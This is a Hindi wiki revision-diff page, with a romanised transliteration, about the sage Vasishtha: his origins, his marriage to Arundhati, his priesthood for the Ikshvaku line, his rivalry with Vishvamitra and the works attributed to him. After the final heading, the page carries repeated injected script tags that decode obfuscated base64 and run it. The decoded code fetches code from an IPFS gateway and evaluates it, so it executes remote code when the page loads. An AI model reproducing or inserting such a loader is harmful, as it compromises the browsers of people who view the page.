Difference between revisions of "वसिष्ठ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
'''महर्षि वसिष्ठ'''<br />
 
'''महर्षि वसिष्ठ'''<br />
 +
वसिष्ठ अर्थात आर्यों की पुरातन ओजस्वी संस्कृति के सृष्टाओं में से एक अपूर्व सृष्टा। 'वस' धातु श्रेष्ठत्व का सूचक है। वसिष्ठ का अर्थ है सबसे प्रकाशवान, सबसे उत्कृष्ट, सबमें श्रेष्ठ और महिमावंत। आदि वसिष्ठ को [[ब्रह्मा]] का मानस पुत्र, प्रजापतियों में एक कहा गया है। स्वयंभू [[मन्वंतर]] में वे ब्रह्मा की प्राणवायु से उत्पन्न हुए थे। बाद के वैवस्वत मन्वंतर में ब्रह्मा के मानस पुत्र के रूप में [[अग्नि]] के मध्य भाग से उत्पन्न हुए। [[यज्ञ]] के ऋत्विज पद को लेकर निमिराजा के साथ षट्राग हुआ, दोनों ने एक दूसरे को श्राप दिया, परिणामस्वरूप दोनों की आत्मा शरीर त्याग कर ब्रह्मलोक में  गयी। वसिष्ठ का तीसरा जन्म, मित्रावरुण ने [[उर्वशी]] को देखा और उनका जो वीर्यस्खलन हुआ, उससे हुआ।
 +
 +
[[वेद]], इतिहास, [[पुराण|पुराणों]] में वसिष्ठ  के अनगिनत कार्यों का उल्लेख किया गया है। वसिष्ठ का विवाह प्रजापति कर्दम की पुत्री [[अरुंधती]] ([[कपिल मुनि]] की बहिन) के साथ हुआ। अरुंधती पति की अवरोधक नहीं थीं, उनका विरोध नहीं करतीं थीं, उसे छोड़ती नहीं थीं। अरुंधती महासाध्वी, तेजस्वी, संस्कारी, पतिव्रता तपस्वी थीं। अरुंधती स्थायी विवाह संबंध  की प्रतीक हैं। वसिष्ठ अरुंधती का दाम्पत्य एक आदर्श माना जाता है। सप्तऋषियों के मध्य में वसिष्ठ के पास अरुंधती नामक तारा है। [[विवाह]] में [[सप्तपदी]] के बाद नवविवाहिता को अरुंधती तारे का दर्शन कराया जाता है, जिससे अरुंधती की भांति ही उसका गृहस्थाश्रम स्थायी, सभी प्रकार से धन्य हो। वसिष्ठ को अरुंधती  से शक्ति  सहित सौ पुत्र हुए थे। शक्ति के पुत्र [[पराशर]] और पराशर के पुत्र [[व्यास]] थे।
  
 
महर्षि वसिष्ठ की उत्पत्ति का वर्णन [[पुराण|पुराणों]] में विभिन्न रूपों में प्राप्त होता है। कहीं ये [[ब्रह्मा]] के मानस पुत्र, कहीं मित्रावरुण के पुत्र और कहीं अग्निपुत्र कहे गये हैं। इनकी पत्नी का नाम [[अरून्धती]] देवी था। जब इनके पिता ब्रह्मा जी ने इन्हें मृत्युलोक में जाकर सृष्टि का विस्तार करने तथा [[सूर्यवंश]] का पौरोहित्य कर्म करने की आज्ञा दी, तब इन्होंने पौरोहित्य कर्म को अत्यन्त निन्दित मानकर उसे करने में अपनी असमर्थता व्यक्त की। ब्रह्मा जी ने इनसे कहा- 'इसी वंश में आगे चलकर मर्यादा पुरुषोत्तम भगवान श्री[[राम]] अवतार ग्रहण करेंगे और यह पौरोहित्य कर्म ही तुम्हारी मुक्ति का मार्ग प्रशस्त करेगा।' फिर इन्होंने इस धराधाम पर मानव-शरीर में आना स्वीकार किया।
 
महर्षि वसिष्ठ की उत्पत्ति का वर्णन [[पुराण|पुराणों]] में विभिन्न रूपों में प्राप्त होता है। कहीं ये [[ब्रह्मा]] के मानस पुत्र, कहीं मित्रावरुण के पुत्र और कहीं अग्निपुत्र कहे गये हैं। इनकी पत्नी का नाम [[अरून्धती]] देवी था। जब इनके पिता ब्रह्मा जी ने इन्हें मृत्युलोक में जाकर सृष्टि का विस्तार करने तथा [[सूर्यवंश]] का पौरोहित्य कर्म करने की आज्ञा दी, तब इन्होंने पौरोहित्य कर्म को अत्यन्त निन्दित मानकर उसे करने में अपनी असमर्थता व्यक्त की। ब्रह्मा जी ने इनसे कहा- 'इसी वंश में आगे चलकर मर्यादा पुरुषोत्तम भगवान श्री[[राम]] अवतार ग्रहण करेंगे और यह पौरोहित्य कर्म ही तुम्हारी मुक्ति का मार्ग प्रशस्त करेगा।' फिर इन्होंने इस धराधाम पर मानव-शरीर में आना स्वीकार किया।
 +
 +
निमि राजा के साथ विवाह के बाद वसिष्ठ ने [[सूर्य वंश]] की दूसरी शाखाओं का पुरोहित कर्म छोड़कर केवल [[इक्ष्वाकु वंश]] के राजगुरु पुरोहित के रूप में कार्य किया। [[दशरथ]] से पुत्रेष्टि यज्ञ कराया जिससे [[राम]] आदि चार पुत्र हुए। अनेक बार आपत्ति का प्रसंग आने पर तपोबल से उन्होंने राजा प्रजा की रक्षा की। राम को शस्त्र शास्त्र की शिक्षा दी। वसिष्ठ के कारण ही 'रामराज्य' की  स्थापना संभव हुई।
  
 
महर्षि वसिष्ठ ने सूर्यवंश का पौरोहित्य करते हुए अनेक लोक-कल्याणकारी कार्यों को सम्पन्न किया। इन्हीं के उपदेश के बल पर [[भगीरथ]] ने प्रयत्न करके [[गंगा नदी|गंगा]]-जैसी लोक कल्याणकारिणी नदी को हम लोगों के लिये सुलभ कराया। [[दिलीप]] को [[नन्दिनी]] की सेवा की शिक्षा देकर [[रघु]]-जैसे पुत्र प्रदान करने वाले तथा महाराज [[दशरथ]] की निराशा में आशा का संचार करने वाले महर्षि वसिष्ठ ही थे। इन्हीं की सम्मति से महाराज दशरथ ने पुत्रेष्टि-यज्ञ सम्पन्न किया और भगवान श्री राम का अवतार हुआ। भगवान श्री राम को शिष्य रूप में प्राप्त कर महर्षि वसिष्ठ का पुरोहित-जीवन सफल हो गया। भगवान श्री राम के वन गमन से लौटने के बाद इन्हीं के द्वारा उनका राज्याभिषेक हुआ। गुरु वसिष्ठ ने श्री राम के राज्यकार्य में सहयोग के साथ उनसे अनेक यज्ञ करवाये।
 
महर्षि वसिष्ठ ने सूर्यवंश का पौरोहित्य करते हुए अनेक लोक-कल्याणकारी कार्यों को सम्पन्न किया। इन्हीं के उपदेश के बल पर [[भगीरथ]] ने प्रयत्न करके [[गंगा नदी|गंगा]]-जैसी लोक कल्याणकारिणी नदी को हम लोगों के लिये सुलभ कराया। [[दिलीप]] को [[नन्दिनी]] की सेवा की शिक्षा देकर [[रघु]]-जैसे पुत्र प्रदान करने वाले तथा महाराज [[दशरथ]] की निराशा में आशा का संचार करने वाले महर्षि वसिष्ठ ही थे। इन्हीं की सम्मति से महाराज दशरथ ने पुत्रेष्टि-यज्ञ सम्पन्न किया और भगवान श्री राम का अवतार हुआ। भगवान श्री राम को शिष्य रूप में प्राप्त कर महर्षि वसिष्ठ का पुरोहित-जीवन सफल हो गया। भगवान श्री राम के वन गमन से लौटने के बाद इन्हीं के द्वारा उनका राज्याभिषेक हुआ। गुरु वसिष्ठ ने श्री राम के राज्यकार्य में सहयोग के साथ उनसे अनेक यज्ञ करवाये।
Line 7: Line 12:
 
महर्षि वसिष्ठ क्षमा की प्रतिपूर्ति थे। एक बार श्री [[विश्वामित्र]] उनके अतिथि हुए। महर्षि वसिष्ठ ने [[कामधेनु]] के सहयोग से उनका राजोचित सत्कार किया। कामधेनु की अलौकिक क्षमता को देखकर विश्वामित्र के मन में लोभ उत्पन्न हो गया। उन्होंने इस गौ को वसिष्ठ से लेने की इच्छा प्रकट की। कामधेनु वसिष्ठ जी के लिये आवश्यक आवश्यकताओं की पूर्ति हेतु महत्त्वपूर्ण साधन थी, अत: इन्होंने उसे देने में असमर्थता व्यक्त की। विश्वामित्र ने कामधेनु को बलपूर्व का ले जाना चाहा। वसिष्ठ जी के संकेत पर कामधेनु ने अपार सेना की सृष्टि कर दी। विश्वामित्र को अपनी सेना के साथ भाग जाने पर विवश होना पड़ा। द्वेष-भावना से प्रेरित होकर विश्वामित्र ने भगवान [[शंकर]] की तपस्या की और उनसे दिव्यास्त्र प्राप्त करके उन्होंने महर्षि वसिष्ठ पर पुन: आक्रमण कर दिया, किन्तु महर्षि वसिष्ठ के ब्रह्मदण्ड के सामने उनके सारे दिव्यास्त्र विफल हो गये और उन्हें क्षत्रिय बल को धिक्कार कर ब्राह्मणत्व लाभी के लिये तपस्या हेतु वन जाना पड़ा।
 
महर्षि वसिष्ठ क्षमा की प्रतिपूर्ति थे। एक बार श्री [[विश्वामित्र]] उनके अतिथि हुए। महर्षि वसिष्ठ ने [[कामधेनु]] के सहयोग से उनका राजोचित सत्कार किया। कामधेनु की अलौकिक क्षमता को देखकर विश्वामित्र के मन में लोभ उत्पन्न हो गया। उन्होंने इस गौ को वसिष्ठ से लेने की इच्छा प्रकट की। कामधेनु वसिष्ठ जी के लिये आवश्यक आवश्यकताओं की पूर्ति हेतु महत्त्वपूर्ण साधन थी, अत: इन्होंने उसे देने में असमर्थता व्यक्त की। विश्वामित्र ने कामधेनु को बलपूर्व का ले जाना चाहा। वसिष्ठ जी के संकेत पर कामधेनु ने अपार सेना की सृष्टि कर दी। विश्वामित्र को अपनी सेना के साथ भाग जाने पर विवश होना पड़ा। द्वेष-भावना से प्रेरित होकर विश्वामित्र ने भगवान [[शंकर]] की तपस्या की और उनसे दिव्यास्त्र प्राप्त करके उन्होंने महर्षि वसिष्ठ पर पुन: आक्रमण कर दिया, किन्तु महर्षि वसिष्ठ के ब्रह्मदण्ड के सामने उनके सारे दिव्यास्त्र विफल हो गये और उन्हें क्षत्रिय बल को धिक्कार कर ब्राह्मणत्व लाभी के लिये तपस्या हेतु वन जाना पड़ा।
  
विश्वामित्र की अपूर्व तपस्या से सभी लोग चमत्कृत हो गये। सब लोगों ने उन्हें ब्रह्मर्षि मान लिया, किन्तु महर्षि वसिष्ठ के ब्रह्मर्षि कहे बिना वे ब्रह्मर्षि नहीं कहला सकते थे। अन्त में उन्होंने वसिष्ठजी को मिटाने का निश्चय कर लिया और उनके आश्रम में एक पेड़ पर छिपकर वसिष्ठ जी को मारने के लिये उपयुक्त अवसर की प्रतीक्षा करने लगे। उसी समय अरून्धती के प्रश्न करने पर वसिष्ठ जी ने विश्वामित्र के अपूर्व तप की प्रशंसा की । क्षमाबल ने पशुबल पर विजय पायी और विश्वामित्र अस्त्र फेंककर श्री वसिष्ठ जी के शरणागत हुए। वसिष्ठ जी ने उन्हें उठाकर गले से लगाया और ब्रह्मर्षि की उपाधि से विभूषित किया। इतिहास-पुराणों में महर्षि वसिष्ठ के चरित्र का विस्तृत वर्णन मिलता है। ये आज भी सप्तर्षियों में रहकर जगत का कल्याण करते रहते हैं।
+
विश्वामित्र की अपूर्व तपस्या से सभी लोग चमत्कृत हो गये। सब लोगों ने उन्हें ब्रह्मर्षि मान लिया, किन्तु महर्षि वसिष्ठ के ब्रह्मर्षि कहे बिना वे ब्रह्मर्षि नहीं कहला सकते थे। वसिष्ठ [[विश्वामित्र]] के बीच के संघर्ष की कथाएं सुविदित हैं। वसिष्ठ क्षत्रिय राजा विश्वामित्र को 'राजर्षि' कह कर सम्बोधित करते थे। विश्वामित्र की इच्छा थी कि वसिष्ठ उन्हें 'महर्षि' कहकर सम्बोधित करें। एक बार रात में छिप कर विश्वामित्र वसिष्ठ को मारने के लिए आये। एकांत में  वसिष्ठ और अरुंधती के बीच हो रही बात उन्होंने सुनी। वसिष्ठ कह रहे थे, 'अहा, ऐसा [[पूर्णिमा]] के [[चन्द्र]] समान निर्मल तप तो कठोर तपस्वी विश्वामित्र के अतिरिक्त भला किस का हो सकता है? उनके जैसा इस समय दूसरा कोई तपस्वी नहीं।' एकांत में शत्रु की प्रशंसा करने वाले महापुरुष के प्रति द्वेष रखने के कारण विश्वामित्र को पश्चाताप हुआ।  शस्त्र हाथ से फेंक कर वे वसिष्ठ के चरणों में गिर पड़े। वसिष्ठ ने विश्वामित्र को हृदय से लगा कर 'महर्षि' कहकर उनका स्वागत किया। इस प्रकार दोनों के बीच शत्रुता का अंत हुआ।   
 +
==व्यक्तित्व==
 +
वसिष्ठ महा तेजस्वी, त्रिकालदर्शी, पूर्णज्ञानी, महातपस्वी, शस्त्र शास्त्र के ज्ञाता और योगी थे। ब्रह्मशक्ति के मूर्तिमान स्वरूप थे, मंत्र यज्ञ विद्या के वे जानकार थे। लोगों की वृत्ति बदलवाकर राष्ट्रों का नव निर्माण करने वाले थे। उनकी कार्य शक्ति अलौकिक थी।
 +
===वसिष्ठ के ग्रंथ===
 +
* [[ऋग्वेद]] के सातवें मंडल के दृष्टा वसिष्ठ हैं। इस मंडल में 104 सूक्तों में 841ऋचाएं हैं। उन्होंने [[अग्निदेव|अग्नि]], [[इन्द्र]], [[उषा]], [[वरुण]], [[मरुत]], [[सविता]], [[सरस्वती]] आदि आर्यों के पूज्य देवी देवताओं की स्तुति मधुर एवं ओजस्वी वाणी में की है।
 +
* योगवासिष्ठ महारामायण - राम वसिष्ठ के संवाद के रूप में इस ग्रंथ के छ: प्रकरण हैं। वैराग्य, मुमुक्षुत्व, उत्पत्ति, स्थिति, उपशम और निर्वाण। कुल मिलाकर इस ग्रंथ में 32 हज़ार  श्लोक हैं। अद्वैत वेदांत के ग्रंथों में इस ग्रंथ का विशिष्ट स्थान है। ग्रंथ में कहा है - '''मानवता पूर्वक जीवन जीए, वही सच्चा मानव है।'''
 +
*वसिष्ठ धर्मसूत्र ( वसिष्ठ स्मृति) - इस ग्रंथ में  30 अध्याय हैं। वर्ण आश्रम के धर्म, संस्कार, स्त्रियों स्नातकों के धर्म, सदाचार, राजधर्म, वैदिक साहित्य की महिमा,  प्रायश्चित, दान का पुण्य आदि विषयों का इसमें समावेश है। महत्वपूर्ण वाक्य : '''धर्म से रहो , अधर्म से नहीं; सत्य बोलो, असत्य नही; दृष्टि दीर्घ रखो, संकीर्ण नहीं और ' पश्यति नापरम परं'''' इसमें कर्म  का महत्व और आचरण का आदर्श प्रस्तुत किया है।
 +
* वसिष्ठ संहिता- यह शाक्त ग्रंथ है। शांति, जय, होम, बलि, दान आदि विषयों के उपरांत इस ग्रंथ में ज्योतिष के विषयों पर विचार किया गया है। ग्रंथ में 45 अध्याय हैं।
 +
* वसिष्ठ रचित धनुर्वेद का एक ग्रंथ कुछ पहले प्राप्त हुआ है।
 +
* वसिष्ठ पुराण, वसिष्ठ श्राद्धकल्प, वसिष्ठ शिक्षा, वसिष्ठ होम विधि, वसिष्ठ तंत्र आदि अन्य ग्रंथों में उनके पहले के व्याकरणकारों के नामों में वसिष्ठ का नाम भी है।
 +
* वसिष्ठ ने [[हिन्दू धर्म]] का सुयश विस्तृत किया, सांस्कृतिक परम्परा निर्माण की, [[सप्तर्षि]] में स्थान प्राप्त करने वाले इस आदर्श 'ब्रह्मर्षि' की भारतीय संस्कृति सदैव ऋणी रहेगी।
 +
इतिहास-पुराणों में महर्षि वसिष्ठ के चरित्र का विस्तृत वर्णन मिलता है। ये आज भी सप्तर्षियों में रहकर जगत का कल्याण करते रहते हैं।
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{रामायण}}{{ॠषि-मुनि2}}
 
{{रामायण}}{{ॠषि-मुनि2}}

Revision as of 09:33, 15 February 2011

maharshi vasishth
vasishth arthat aryoan ki puratan ojasvi sanskriti ke srishtaoan mean se ek apoorv srishta. 'vas' dhatu shreshthatv ka soochak hai. vasishth ka arth hai sabase prakashavan, sabase utkrisht, sabamean shreshth aur mahimavant. adi vasishth ko brahma ka manas putr, prajapatiyoan mean ek kaha gaya hai. svayanbhoo manvantar mean ve brahma ki pranavayu se utpann hue the. bad ke vaivasvat manvantar mean brahma ke manas putr ke roop mean agni ke madhy bhag se utpann hue. yajn ke rritvij pad ko lekar nimiraja ke sath shatrag hua, donoan ne ek doosare ko shrap diya, parinamasvaroop donoan ki atma sharir tyag kar brahmalok mean gayi. vasishth ka tisara janm, mitravarun ne urvashi ko dekha aur unaka jo viryaskhalan hua, usase hua.

ved, itihas, puranoan mean vasishth ke anaginat karyoan ka ullekh kiya gaya hai. vasishth ka vivah prajapati kardam ki putri aruandhati (kapil muni ki bahin) ke sath hua. aruandhati pati ki avarodhak nahian thian, unaka virodh nahian karatian thian, use chho dati nahian thian. aruandhati mahasadhvi, tejasvi, sanskari, pativrata tapasvi thian. aruandhati sthayi vivah sanbandh ki pratik haian. vasishth aruandhati ka dampaty ek adarsh mana jata hai. saptrrishiyoan ke madhy mean vasishth ke pas aruandhati namak tara hai. vivah mean saptapadi ke bad navavivahita ko aruandhati tare ka darshan karaya jata hai, jisase aruandhati ki bhaanti hi usaka grihasthashram sthayi, sabhi prakar se dhany ho. vasishth ko aruandhati se shakti sahit sau putr hue the. shakti ke putr parashar aur parashar ke putr vyas the.

maharshi vasishth ki utpatti ka varnan puranoan mean vibhinn roopoan mean prapt hota hai. kahian ye brahma ke manas putr, kahian mitravarun ke putr aur kahian agniputr kahe gaye haian. inaki patni ka nam aroondhati devi tha. jab inake pita brahma ji ne inhean mrityulok mean jakar srishti ka vistar karane tatha sooryavansh ka paurohity karm karane ki ajna di, tab inhoanne paurohity karm ko atyant nindit manakar use karane mean apani asamarthata vyakt ki. brahma ji ne inase kaha- 'isi vansh mean age chalakar maryada purushottam bhagavan shriram avatar grahan kareange aur yah paurohity karm hi tumhari mukti ka marg prashast karega.' phir inhoanne is dharadham par manav-sharir mean ana svikar kiya.

nimi raja ke sath vivah ke bad vasishth ne soory vansh ki doosari shakhaoan ka purohit karm chho dakar keval ikshvaku vansh ke rajaguru purohit ke roop mean kary kiya. dasharath se putreshti yajn karaya jisase ram adi char putr hue. anek bar apatti ka prasang ane par tapobal se unhoanne raja praja ki raksha ki. ram ko shastr shastr ki shiksha di. vasishth ke karan hi 'ramarajy' ki sthapana sanbhav huee.

maharshi vasishth ne sooryavansh ka paurohity karate hue anek lok-kalyanakari karyoan ko sampann kiya. inhian ke upadesh ke bal par bhagirath ne prayatn karake ganga-jaisi lok kalyanakarini nadi ko ham logoan ke liye sulabh karaya. dilip ko nandini ki seva ki shiksha dekar raghu-jaise putr pradan karane vale tatha maharaj dasharath ki nirasha mean asha ka sanchar karane vale maharshi vasishth hi the. inhian ki sammati se maharaj dasharath ne putreshti-yajn sampann kiya aur bhagavan shri ram ka avatar hua. bhagavan shri ram ko shishy roop mean prapt kar maharshi vasishth ka purohit-jivan saphal ho gaya. bhagavan shri ram ke van gaman se lautane ke bad inhian ke dvara unaka rajyabhishek hua. guru vasishth ne shri ram ke rajyakary mean sahayog ke sath unase anek yajn karavaye.

maharshi vasishth kshama ki pratipoorti the. ek bar shri vishvamitr unake atithi hue. maharshi vasishth ne kamadhenu ke sahayog se unaka rajochit satkar kiya. kamadhenu ki alaukik kshamata ko dekhakar vishvamitr ke man mean lobh utpann ho gaya. unhoanne is gau ko vasishth se lene ki ichchha prakat ki. kamadhenu vasishth ji ke liye avashyak avashyakataoan ki poorti hetu mahattvapoorn sadhan thi, at: inhoanne use dene mean asamarthata vyakt ki. vishvamitr ne kamadhenu ko balapoorv ka le jana chaha. vasishth ji ke sanket par kamadhenu ne apar sena ki srishti kar di. vishvamitr ko apani sena ke sath bhag jane par vivash hona p da. dvesh-bhavana se prerit hokar vishvamitr ne bhagavan shankar ki tapasya ki aur unase divyastr prapt karake unhoanne maharshi vasishth par pun: akraman kar diya, kintu maharshi vasishth ke brahmadand ke samane unake sare divyastr viphal ho gaye aur unhean kshatriy bal ko dhikkar kar brahmanatv labhi ke liye tapasya hetu van jana p da.

vishvamitr ki apoorv tapasya se sabhi log chamatkrit ho gaye. sab logoan ne unhean brahmarshi man liya, kintu maharshi vasishth ke brahmarshi kahe bina ve brahmarshi nahian kahala sakate the. vasishth vishvamitr ke bich ke sangharsh ki kathaean suvidit haian. vasishth kshatriy raja vishvamitr ko 'rajarshi' kah kar sambodhit karate the. vishvamitr ki ichchha thi ki vasishth unhean 'maharshi' kahakar sambodhit karean. ek bar rat mean chhip kar vishvamitr vasishth ko marane ke lie aye. ekaant mean vasishth aur aruandhati ke bich ho rahi bat unhoanne suni. vasishth kah rahe the, 'aha, aisa poornima ke chandr saman nirmal tap to kathor tapasvi vishvamitr ke atirikt bhala kis ka ho sakata hai? unake jaisa is samay doosara koee tapasvi nahian.' ekaant mean shatru ki prashansa karane vale mahapurush ke prati dvesh rakhane ke karan vishvamitr ko pashchatap hua. shastr hath se pheank kar ve vasishth ke charanoan mean gir p de. vasishth ne vishvamitr ko hriday se laga kar 'maharshi' kahakar unaka svagat kiya. is prakar donoan ke bich shatruta ka aant hua.

vyaktitv

vasishth maha tejasvi, trikaladarshi, poornajnani, mahatapasvi, shastr shastr ke jnata aur yogi the. brahmashakti ke moortiman svaroop the, mantr yajn vidya ke ve janakar the. logoan ki vritti badalavakar rashtroan ka nav nirman karane vale the. unaki kary shakti alaukik thi.

vasishth ke granth

  • rrigved ke satavean mandal ke drishta vasishth haian. is mandal mean 104 sooktoan mean 841rrichaean haian. unhoanne agni, indr, usha, varun, marut, savita, sarasvati adi aryoan ke poojy devi devataoan ki stuti madhur evan ojasvi vani mean ki hai.
  • yogavasishth maharamayan - ram vasishth ke sanvad ke roop mean is granth ke chh: prakaran haian. vairagy, mumukshutv, utpatti, sthiti, upasham aur nirvan. kul milakar is granth mean 32 hazar shlok haian. advait vedaant ke granthoan mean is granth ka vishisht sthan hai. granth mean kaha hai - manavata poorvak jivan jie, vahi sachcha manav hai.
  • vasishth dharmasootr ( vasishth smriti) - is granth mean 30 adhyay haian. varn ashram ke dharm, sanskar, striyoan snatakoan ke dharm, sadachar, rajadharm, vaidik sahity ki mahima, prayashchit, dan ka puny adi vishayoan ka isamean samavesh hai. mahatvapoorn vaky : dharm se raho , adharm se nahian; saty bolo, asaty nahi; drishti dirgh rakho, sankirn nahian aur ' pashyati naparam paran'. isamean karm ka mahatv aur acharan ka adarsh prastut kiya hai.
  • vasishth sanhita- yah shakt granth hai. shaanti, jay, hom, bali, dan adi vishayoan ke uparaant is granth mean jyotish ke vishayoan par vichar kiya gaya hai. granth mean 45 adhyay haian.
  • vasishth rachit dhanurved ka ek granth kuchh pahale prapt hua hai.
  • vasishth puran, vasishth shraddhakalp, vasishth shiksha, vasishth hom vidhi, vasishth tantr adi any granthoan mean unake pahale ke vyakaranakaroan ke namoan mean vasishth ka nam bhi hai.
  • vasishth ne hindoo dharm ka suyash vistrit kiya, saanskritik parampara nirman ki, saptarshi mean sthan prapt karane vale is adarsh 'brahmarshi' ki bharatiy sanskriti sadaiv rrini rahegi.

itihas-puranoan mean maharshi vasishth ke charitr ka vistrit varnan milata hai. ye aj bhi saptarshiyoan mean rahakar jagat ka kalyan karate rahate haian.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>